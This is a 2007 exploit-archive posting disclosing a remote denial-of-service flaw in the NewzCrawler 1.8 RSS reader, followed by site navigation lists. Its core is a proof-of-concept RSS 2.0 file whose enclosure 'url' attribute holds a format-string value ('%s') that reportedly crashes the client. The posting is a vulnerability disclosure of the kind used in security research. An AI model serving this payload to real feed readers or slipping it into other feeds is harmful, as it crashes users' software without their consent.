newzcrawler-dos.txt

newzcrawler-dos.txt: Posted May 16, 2007; Authored by gbr; NewzCrawler version 1.8 remote denial of service exploit.; tags | exploit, remote, denial of service; SHA-256 | a0c038a82b6defd7dbd18987257148494f7a6fa1ef7f88be15cebf7060a9ea15; Download | Favorite | View

newzcrawler-dos.txt

NewzCrawler 1.8 Remote Denial of Service
Credits: gbr
Tested on Windows XP SP2

NewzCrawler 1.8 becomes usntable and begin crash when parsering the 'url' atribute of
'enclosure' sub-element contends some invalid string* at time of show a new item of a 
RSS 2.0 file.

* '%s', '%Y', '%%', 'n,', and others.

PoC:

<?xml version="1.0"?>
<rss version="2.0">

<channel>
        <title>Test</title>
        <link></link>
        <description></description>

        <item>
                <title>Remote DoS PoC</title>
                <enclosure url="%s"/>
        </item>
</channel>
</rss>

Top Authors In Last 30 Days

Red Hat 219 files
indoushka 83 files
Ubuntu 79 files
Gentoo 36 files
Jasper Nota 25 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,707)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,485)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,737)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

newzcrawler-dos.txt

newzcrawler-dos.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

newzcrawler-dos.txt

Share This

newzcrawler-dos.txt

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems